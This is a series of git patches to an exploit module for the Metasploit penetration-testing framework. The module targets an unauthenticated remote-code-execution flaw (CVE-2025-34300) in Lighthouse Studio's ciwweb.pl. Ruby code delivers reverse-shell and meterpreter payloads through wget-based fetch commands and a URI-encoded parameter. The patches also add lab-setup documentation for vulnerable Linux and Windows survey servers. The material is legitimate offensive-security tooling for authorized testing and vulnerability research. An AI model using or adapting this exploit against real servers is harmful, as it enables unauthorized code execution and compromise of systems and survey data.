+++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -85,7 +85,7 @@ def initialize(info = {}) 'DisclosureDate' => '2025-07-16', 'Notes' => { 'Stability' => [CRASH_SAFE], - 'SideEffects' => [IOC_IN_LOGS], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'Reliability' => [REPEATABLE_SESSION] } ) @@ -95,6 +95,7 @@ def initialize(info = {}) [ OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']), + OptString.new('WritableDir', [false, 'Writable directory for Windows Dropper', 'C:\\Windows\\Tasks\\']) ] ) end @@ -163,7 +164,10 @@ def exploit case target['Type'] when :windows_dropper - execute_cmdstager(temp: '.') + # This applies only to Windows + # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly + # Files on the disk are also not deleted + execute_cmdstager(temp: datastore['WritableDir']) when :nix_dropper execute_cmdstager when :windows_command, :nix_command From 38b0bd15e1a3e6d3d20dc05e0af9cc5077178c0f Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Thu, 24 Jul 2025 07:19:25 +0400 Subject: [PATCH 14/18] Code Review Edits --- ...thouse_studio_unauth_rce_CVE_2025_34300.md | 4 ++ ...thouse_studio_unauth_rce_cve_2025_34300.rb | 67 +++++-------------- 2 files changed, 21 insertions(+), 50 deletions(-) diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index 10d7f1b23250a..661c9182cd737 100644 --- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -299,6 +299,10 @@ If all configurations are correct, Lighthouse Studio will: - Initialize the MySQL database - Generate CGI scripts +OR (in case of any errors) + +Use this instruction to upload manually [Manual Upload to Server](https://sawtoothsoftware.com/help/lighthouse-studio/manual/manual-upload.html) + ## Scenario ``` diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 789978e3c255d..cdad1a5daeb6f 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) @@ -26,7 +25,7 @@ def initialize(info = {}) Successful exploitation may result in remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations. - An attacker can execute arbitrary system commands as the web server. + An attacker can execute arbitrary system commands in the context of the user running the web server. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -41,45 +40,27 @@ def initialize(info = {}) 'Arch' => [ARCH_CMD], 'Targets' => [ [ - 'Linux Dropper', - { - 'Platform' => ['linux'], - 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], - 'Type' => :nix_dropper, - 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } - } - ], - [ - 'Linux Command', + 'Unix Command', { 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD], - 'Type' => :nix_command, - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } - } - ], - [ - 'Windows Dropper', - { - 'Platform' => 'win', - 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], - 'Type' => :windows_dropper, - 'DefaultOptions' => { - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' - } + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd + # Tested with cmd/unix/reverse_bash + # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows Command', { - 'Platform' => 'win', - 'Arch' => [ARCH_CMD], - 'Type' => :windows_command, + 'Platform' => ['windows'], + 'Arch' => ARCH_CMD, + 'Type' => :win_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' + 'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\' } + # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp } - ] + ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2025-07-16', @@ -95,7 +76,6 @@ def initialize(info = {}) [ OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']), - OptString.new('WritableDir', [false, 'Writable directory for Windows Dropper', 'C:\\Windows\\Tasks\\']) ] ) end @@ -133,8 +113,11 @@ def check CheckCode::Safe end - def execute_command(cmd, _opts = {}) - cmd = Rex::Text.uri_encode(cmd).gsub('\\', '%5C').gsub('/', '%2F') + def exploit + print_status('Uploading malicious payload...') + + cmd = Rex::Text.uri_encode(payload.encoded).gsub('\\', '%5C').gsub('/', '%2F') + cmd = "cmd.exe%20/q%20/c%20\"#{cmd}\"" if target['Type'] == :win_cmd query = [ 'hid_javascript=1', @@ -158,20 +141,4 @@ def execute_command(cmd, _opts = {}) end end end - - def exploit - print_status('Uploading malicious payload...') - - case target['Type'] - when :windows_dropper - # This applies only to Windows - # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly - # Files on the disk are also not deleted - execute_cmdstager(temp: datastore['WritableDir']) - when :nix_dropper - execute_cmdstager - when :windows_command, :nix_command - execute_command(payload.encoded) - end - end end From 6e5d474b21a52c82218fec11a90892976c618bff Mon Sep 17 00:00:00 2001 From: Maksim Rogov <187316334+vognik@users.noreply.github.com> Date: Thu, 24 Jul 2025 06:23:01 +0300 Subject: [PATCH 15/18] Apply suggestion from @jheysel-r7 in Docs Co-authored-by: jheysel-r7 --- .../multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index 661c9182cd737..a79f6f1593ff4 100644 --- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -10,7 +10,7 @@ This vulnerability affects Lighthouse Studio versions prior to 9.16.14. Successful exploitation may result in remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations. -An attacker can execute arbitrary system commands as the web server. +An attacker can execute arbitrary system commands in the context of the user running the web server. ## STUDYNAME parameter From 82eadede83f9894326a3da7aabf2dd2df5d8ecde Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Fri, 25 Jul 2025 05:17:48 +0400 Subject: [PATCH 16/18] Code Review Edits from @sjanusz-r7 --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 24 +++++++++++++------ 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index cdad1a5daeb6f..8ebb29897f633 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -44,7 +44,11 @@ def initialize(info = {}) { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, - 'Type' => :unix_cmd + 'Type' => :unix_cmd, + 'DefaultOptions' => { + # On Ubuntu 18.04.06 LTS curl is not installed by default + 'FETCH_COMMAND' => 'WGET' + } # Tested with cmd/unix/reverse_bash # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp } @@ -56,12 +60,19 @@ def initialize(info = {}) 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { - 'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\' + # Environment variables like %TEMP% don't resolve + 'FETCH_WRITABLE_DIR' => '\\Windows\\Tasks\\' + }, + 'Payload' => { + 'Prepend' => 'cmd.exe /q /c ' } # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp } ], ], + 'Payload' => { + 'BadChars' => '\\' + }, 'DefaultTarget' => 0, 'DisclosureDate' => '2025-07-16', 'Notes' => { @@ -93,7 +104,7 @@ def check 'method' => 'GET', 'vars_get' => vars ) - return CheckCode::Unknown('No response from target') unless res + return CheckCode::Unknown('No response from target') unless res&.code == 200 if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ version_match = Regexp.last_match(1).to_s @@ -116,8 +127,7 @@ def check def exploit print_status('Uploading malicious payload...') - cmd = Rex::Text.uri_encode(payload.encoded).gsub('\\', '%5C').gsub('/', '%2F') - cmd = "cmd.exe%20/q%20/c%20\"#{cmd}\"" if target['Type'] == :win_cmd + cmd = Rex::Text.uri_encode(payload.encoded) query = [ 'hid_javascript=1', @@ -136,8 +146,8 @@ def exploit if res html = res.get_html_document - if html&.text&.include?('Cannot find default studyname') - fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + if html&.text&.include?('Cannot find the study name') + fail_with(Failure::BadConfig, 'The STUDYNAME value was not found on the server') end end end From 8024900171082160ee67c10e84d13d67dc199437 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Sat, 26 Jul 2025 03:15:00 +0400 Subject: [PATCH 17/18] fix tests --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 8ebb29897f633..9be72ec4dfddd 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -64,7 +64,7 @@ def initialize(info = {}) 'FETCH_WRITABLE_DIR' => '\\Windows\\Tasks\\' }, 'Payload' => { - 'Prepend' => 'cmd.exe /q /c ' + 'Prepend' => 'cmd.exe /q /c' } # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp } From b13f59128c61f3d10c86cc78805930bc03e43686 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 18 Aug 2025 08:20:32 +0400 Subject: [PATCH 18/18] Added Setup Guide for Windows --- ...thouse_studio_unauth_rce_CVE_2025_34300.md | 37 ++++++++++++++++--- 1 file changed, 32 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index a79f6f1593ff4..0436d3fe7df3d 100644 --- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -19,6 +19,8 @@ The `hid_studyname` parameter serves as the identifier of the survey or test bei ## Testing +### Setup a Linux Server to Host the Lighhouse Survey + To set up a test environment: 1. Download and Install Ubuntu 18.04.6 LTS @@ -230,14 +232,16 @@ sudo systemctl restart apache2 Now CGI scripts in /var/www/html/cgi-bin/ should be executable. -11. Download and Install Windows (on Second VM) +### Create the Lighthouse Survey + +1. Download and Install Windows (on Second VM) Download Windows 10 ISO from the official Microsoft site: https://www.microsoft.com/en-us/software-download/windows10 Follow standard installation steps in your hypervisor (e.g., VirtualBox, VMware, etc.). -12. Download and Install Vulnerable Lighthouse Studio +2. Download and Install Vulnerable Lighthouse Studio This is the vulnerable application used to build and upload surveys. @@ -248,7 +252,7 @@ https://sawtoothsoftware.com/resources/software-downloads/lighthouse-studio/vers Install Lighthouse Studio using default options. -13. Create and Save a New Study +3. Create and Save a New Study Use @@ -259,7 +263,7 @@ File -> New Study and follow instructions. In the end save the study. -14. Upload the Study to the Ubuntu VM +4. Upload the Study to the Ubuntu VM To host your survey on the Ubuntu VM: @@ -289,7 +293,7 @@ In the "Advanced" Tab Set the Database Server Host Name — enter the IP address of your Ubuntu VM. -15. Upload the Survey to Server +5. Upload the Survey to Server Click the "Upload Survey to Server" button. @@ -303,6 +307,29 @@ OR (in case of any errors) Use this instruction to upload manually [Manual Upload to Server](https://sawtoothsoftware.com/help/lighthouse-studio/manual/manual-upload.html) +## Setup a Windows Server to Host Lighthouse Survey + +1. Install xampp + +2. Place survey for manual upload in c:\xampp\htdocs\ + +3. Install Perl 5.38 + +- Avoid installing 5.40 as it's missing some essential MySQL libraries required to connect the Lighthouse survey to database which is required in order to exploit this vulnerability + +3. Either find and replace these with #!C:/Strawberry/perl/bin/perl.exe or edit the apache config such that Apache will always send these files to Strawberry Perl +- The .pl and .cgi files LightHouse generates will start with #!/usr/bin/pearl which windows will fail to interpret + +4. Make the same edits to the Apache config as you would do on Linux to make the cgi scripts executable + +5. Install the same Perl modules as you would during the Linux install + +6. In phpMyAdmin, create the DB user and DB specified in the Survey you created in Lighthouse + +7. Ensure the user has the necessary privileges over the DB + +8. Navigate the to the //WebUpload/cgi-bin/admin.pl endpoint in the survey, authenticate with the admin credentials and ensure the the DB is connected and there were no errors durning setup + ## Scenario ```